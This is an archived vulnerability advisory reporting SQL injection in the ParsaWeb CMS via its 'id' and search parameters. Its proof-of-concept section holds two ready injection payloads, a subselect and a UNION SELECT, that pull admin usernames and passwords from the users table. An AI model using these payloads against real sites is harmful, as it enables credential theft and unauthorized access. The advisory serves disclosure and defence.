Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: va1413.htm

ParsaWeb CMS SQL Injection



ParsaWeb CMS SQL Injection
ParsaWeb CMS SQL Injection



########################## www.BugReport.ir 
#######################################
#
#=09=09AmnPardaz Security Research Team
#
# Title: ParsaWeb CMS SQL Injection
# Vendor: http://www.parsagostar.com 
# Demo: http://cms.parsagostar.com/ 
# Exploit: Available
# Impact: High
# Fix: N/A
# Original advisory: http://www.bugreport.ir/index_53.htm 
###################################################################################

####################
1. Description:
####################

=09ParsaWeb is a commercial ASP.NET website and content management system.

####################
2. Vulnerabilities:
####################

=09Input passed to the "id" parameter in default.aspx and txtSearch in  
search section are not properly sanitised before being used in SQL  
queries.
=09This can be exploited to manipulate SQL queries by injecting  
arbitrary SQL code.


####################
3. Exploits/POCs:
####################

=09http://www.example.com/?page=page&id=-164 or 1=(select top 1 
user_pass from tblUsers where user_name = 'admin')

=09http://www.example.com/?page=Search 
=09Search:AmnPardaz%') union ALL select  
'1',user_name+':'+user_pass,'3','4','5','6','7','8','9','10',11 from  
tblUsers--



####################
4. Solution:
####################

=09Edit the source code to ensure that inputs are properly sanitized.

####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir 
www.AmnPardaz.com 




TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH